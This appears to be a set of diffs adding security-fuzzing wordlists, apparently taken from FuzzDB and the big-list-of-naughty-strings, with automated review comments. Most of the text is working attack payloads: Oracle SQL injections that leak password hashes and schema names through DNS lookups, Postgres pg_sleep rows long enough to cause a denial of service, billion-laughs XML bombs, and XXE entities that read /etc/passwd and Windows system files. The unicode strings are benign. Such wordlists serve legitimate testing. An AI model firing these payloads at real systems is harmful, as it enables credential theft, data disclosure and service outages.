' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
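Review bot: `'||utl_http.request('httP://192.168.1.1/')||'` makes the database call out to a hard-coded private address the fuzzer does not control, so a successful injection is never observed; the callback host should come from the run's configuration or the row should go. `' || myappadmin.adduser('admin', 'newpass') || '` attempts a persistent state change (creating an admin account) on the target, which does not belong in a detection list and should be removed. The rows using `SYS.LOGINUSER` look like a typo for `SYS.LOGIN_USER`, which an earlier row already uses correctly; as written those role-enumeration rows would most likely error out rather than resolve. A header comment should also note that the `SYS.USER$` rows exfiltrate password hashes via DNS when they succeed, so operators know what they are sending.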


@@ -0,0 +1,12 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/detect/GenericBlind.txt)
pg_sleep(200000)--
1 or pg_sleep(200000)--
" or pg_sleep(200000)--
' or pg_sleep(200000)--
1) or pg_sleep(200000)--
") or pg_sleep(200000)--
') or pg_sleep(200000)--
1)) or pg_sleep(200000)--
")) or pg_sleep(200000)--
')) or pg_sleep(200000)--
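Review bot: `pg_sleep(200000)` keeps the target's backend busy for roughly 55 hours per successful injection, so a hit becomes a denial of service on the database while the client only sees a timeout. A delay just beyond the HTTP client's read timeout, e.g. `pg_sleep(10)`, gives the same detection signal without the damage.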


@@ -0,0 +1,6 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮


@@ -0,0 +1,9 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
😍
👩🏽
👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
🐵 🙈 🙉 🙊
❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
0⃣ 1⃣ 2⃣ 3⃣ 4⃣ 5⃣ 6⃣ 7⃣ 8⃣ 9⃣ 🔟


@@ -0,0 +1,2 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/control-chars/imessage.txt)
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗


@@ -0,0 +1,12 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ
(。◕ ∀ ◕。)
`ィ(´∀`∩
__ロ(,_,*)
・( ̄∀ ̄)・:*:
゚・✿ヾ╲(。◕‿◕。)╱✿・゚
,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’
(╯°□°)╯︵ ┻━┻)
(ノಥ益ಥ)ノ ┻━┻
┬─┬ノ( º _ ºノ)
( ͡° ͜ʖ ͡°)


@@ -0,0 +1,21 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
Ω≈ç√∫˜µ≤≥÷
åß∂ƒ©˙∆˚¬…æ
œ∑´®†¥¨ˆøπ“‘
¡™£¢∞§¶•ªº–≠
¸˛Ç◊ı˜Â¯˘¿
ÅÍÎÏ˝ÓÔÒÚÆ☃
Œ„´‰ˇÁ¨ˆØ∏”’
`⁄€‹›fifl‡°·‚—±
⅛⅜⅝⅞
ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
٠١٢٣٤٥٦٧٨٩
⁰⁴⁵
₀₁₂
⁰⁴⁵₀₁₂
ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็


@@ -0,0 +1,4 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸
🇺🇸🇷🇺🇸🇦🇫🇦🇲
🇺🇸🇷🇺🇸🇦


@@ -0,0 +1,6 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
הָיְתָהtestالصفحات التّحول


@@ -0,0 +1,10 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
田中さんにあげて下さい
パーティーへ行かないか
和製漢語
部落格
사회과학원 어학연구소
찦차를 타고 온 펲시맨과 쑛다리 똠방각하
社會科學院語學研究所
울란바토르
𠜎𠜱𠝹𠱓𠱸𠲖𠳏


@@ -0,0 +1,3 @@
# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
00˙Ɩ$-


@@ -0,0 +1,9 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
# General timeouts
count(/child::node())
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
# Billion laughs attack
<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>
"<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>"


@@ -0,0 +1,16 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
"<xml SRC=""c:\boot.ini"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\unknown\unknown"">]><foo>&xxe;</foo>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\unknown\unknown">]><foo>&xee;</foo>o>
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\unknown\unknown">
"<xml SRC=""/unknown/unknown"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////unknown/unknown"">]><foo>&xxe;</foo>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///unknown/unknown">]><foo>&xee;</foo>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///unknown/unknown">
"<xml SRC=""/unknown/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////unknown/"">]><foo>&xxe;</foo>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///unknown/">]><foo>&xee;</foo>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///unknown/">
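Review bot: Three rows declare the entity as `xxe` but reference `&xee;`, so the entity is never expanded and those rows cannot exercise the external-entity path (the same slip exists in the FuzzDB source); change the reference to `&xxe;`. The first of them also ends in `</foo>o>`, a stray fragment. The `<!DOCTYPE autofillupload [<!ENTITY … SYSTEM "…">` rows are unterminated (no `]>` and no document element); if that is intentional as a parser-robustness probe, say so in a comment, otherwise close them. The rows quoted with doubled `""` use CSV escaping that nothing else in this file needs, so they will reach the target with literal doubled quotes.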


@@ -0,0 +1,23 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
"<xml SRC=""/apache/logs/access.log"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""/etc/passwd"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""/apache/logs/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""/etc/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////apache/logs/access.log"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////apache/logs/"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/"">]><foo>&xxe;</foo>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///apache/logs/access.log">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///apache/logs/">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/">]><foo>&xee;</foo>
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs/access.log">
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs/">
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/">
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs">
<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc">


@@ -0,0 +1,35 @@
# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
"<xml SRC=""c:\boot.ini"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\inetpub\wwwroot\index.asp"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\pagefile.sys"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\Windows\system.ini"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\Windows\"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""c:\inetpub\"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\inetpub\wwwroot\index.asp"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\pagefile.sys"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\Windows\system.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\Windows\"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\inetpub\"">]><foo>&xxe;</foo>"
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\boot.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\inetpub\wwwroot\index.asp">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\pagefile.sys">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\Windows\system.ini">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\Windows\">]><foo>&xee;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\inetpub\">]><foo>&xee;</foo>
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\boot.ini">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\inetpub\wwwroot\index.asp">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\pagefile.sys">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\Windows\system.ini">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\Windows\">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\inetpub\">
<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\Windows">
